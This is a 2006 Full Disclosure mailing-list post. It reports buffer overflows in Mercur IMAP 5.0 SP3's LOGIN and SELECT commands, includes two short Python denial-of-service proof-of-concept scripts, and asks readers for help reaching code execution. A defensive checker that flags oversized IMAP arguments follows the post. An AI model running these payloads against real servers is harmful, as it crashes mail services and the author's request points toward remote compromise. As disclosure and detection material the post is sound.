Full Disclosure mailing list archives
Mercur IMAPD 5.0 SP3 DoS Exploit or more?
From: "Tim Taylor" <Tim.Taylor () gmx ch>
Date: Thu, 16 Mar 2006 22:30:44 +0100 (MET)
Hi folks,

I found these bugs in an IMAP server called Mercur IMAP 5.0 SP3 from http://www.atrium-software.com/, but I was not able to exploit it successfully for a remote shell on WinXP Service Pack 2. The program has an internal check for the string length or something like that. I can overwrite the EIP successfully but cannot put my shellcode behind the EIP. Because of this I have to write the shellcode in front of the EIP, and this leaves 135 bytes for the shellcode without the required "a login" or "a select". Perhaps someone has a clue and can solve these problems and teach me some lessons for the future.

-- DoS Exploit --

# Atrium Mercur IMAP 5.0 SP3 DoS Exploit
# pre-authentication buffer overflow in the IMAP LOGIN command
import socket
s = socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)                                  # server greeting
s.send("a001 login " + "\x41" * 275 + "\r\n")       # 275-byte user name argument

# buffer overflow in IMAP commands like SELECT and others (after a valid login)
import socket
s = socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)                                  # server greeting
s.send("a001 login test test\r\n")                 # any valid account
print s.recv(256)                                  # login response
s.send("a002 select " + "\x41" * 239 + "\r\n")      # 239-byte mailbox name argument

By the way, at first look it seems to be like some older bugs in this piece of software, but I do not think so.

Cheers
Tim Taylor
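The post boils down to two IMAP command lines whose single argument is far longer than any legitimate user name or mailbox name. The following is an added example, not part of Tim Taylor's post or of Mercur: a small checker that a defender could run over captured client-to-server IMAP lines (or place in a proxy) to flag oversized LOGIN and SELECT arguments. The per-command limits and the sample traffic are constructed assumptions, not vendor values.

```python
import re

# Conservative per-argument limits for the commands the post exercises.
# Constructed values, not vendor limits: RFC 3501 does not cap these, but
# legitimate user names and mailbox names rarely exceed a few dozen bytes.
ARG_LIMITS = {"LOGIN": 64, "SELECT": 128}

# IMAP command line: <tag> <command> [arguments], terminated by CRLF.
IMAP_LINE = re.compile(rb"^(?P<tag>[^\s\r\n]+) (?P<cmd>[A-Za-z]+)(?: (?P<args>.*?))?\r?\n?$")


def split_args(raw):
    """Split IMAP arguments on whitespace, keeping double-quoted strings intact."""
    return [a.strip(b'"') for a in re.findall(rb'"[^"]*"|\S+', raw)]


def check_imap_line(line):
    """Return a finding dict for a suspicious line, or None if it looks benign.

    A line is flagged when any single argument exceeds ARG_LIMITS[cmd].
    Lines that do not even parse as <tag> <command> are reported as malformed.
    """
    m = IMAP_LINE.match(line)
    if not m:
        return {"reason": "malformed", "length": len(line)}
    cmd = m.group("cmd").upper().decode()
    limit = ARG_LIMITS.get(cmd)
    if limit is None:
        return None
    for arg in split_args(m.group("args") or b""):
        if len(arg) > limit:
            return {"reason": "oversized-arg", "cmd": cmd, "length": len(arg), "limit": limit}
    return None


def scan(lines):
    """Run check_imap_line over a list of captured lines; return (index, finding) pairs."""
    return [(i, f) for i, line in enumerate(lines) if (f := check_imap_line(line))]


# Constructed sample traffic: a normal session plus the two shapes from the post.
SAMPLE = [
    b"a001 login test test\r\n",
    b"a002 select INBOX\r\n",
    b"a003 login " + b"A" * 275 + b"\r\n",
    b"a004 select " + b"A" * 239 + b"\r\n",
    b"a005 logout\r\n",
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE):
        print(idx, finding)
```

Only the two oversized lines are reported; a normal login, SELECT INBOX and LOGOUT pass.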
Current thread:
- Mercur IMAPD 5.0 SP3 DoS Exploit or more? Tim Taylor (Mar 16)
- Re: Mercur IMAPD 5.0 SP3 DoS Exploit or more? 3APA3A (Mar 17)